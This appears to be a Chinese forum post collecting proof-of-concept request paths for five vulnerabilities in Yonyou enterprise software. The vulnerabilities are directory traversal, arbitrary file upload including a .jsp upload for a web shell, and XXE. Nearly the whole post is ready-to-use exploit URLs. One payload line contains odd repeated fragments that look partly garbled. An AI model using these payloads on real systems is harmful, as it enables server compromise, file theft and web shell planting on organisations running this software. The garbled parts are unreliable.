用友漏洞 PoC 整理
本文内容为互联网上收集,禁止用于非法用途,仅供学习使用!1、用友 FE 协作办公平台目录遍历
templateOfTaohong_manager.jsp
/system/mediafile/templateofTaoHong_manager.jsp?path={{{path}}}
2、用友 GRP-U8 财务管理软件任意文件上传
/UploadFileData?action=upload_file&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=181=1&1=1&1=1&1=1&1=1&1=1&1=1&1=181=1&1=1&1=1&1=181=1&1=1&1=1&foldername=%2e%2e%2f&filename=
3、用友 NC 系统 uapws wsdl XXE
/uapws/service/nc.uap.oba.update.IUpdateService?xsd={{{xmlUrl}}}
4、用友 u8 cloud 任意文件上传漏洞
/nccloud 前台文件上传
/hrss/servlet/uploadimg2File
5、用友时空 KSOA 软件前台文件上传漏洞
/servlet/com.sksoft.bill.ImageUpload?filepath=/&filename=gmtxj.jsp
页:
[1]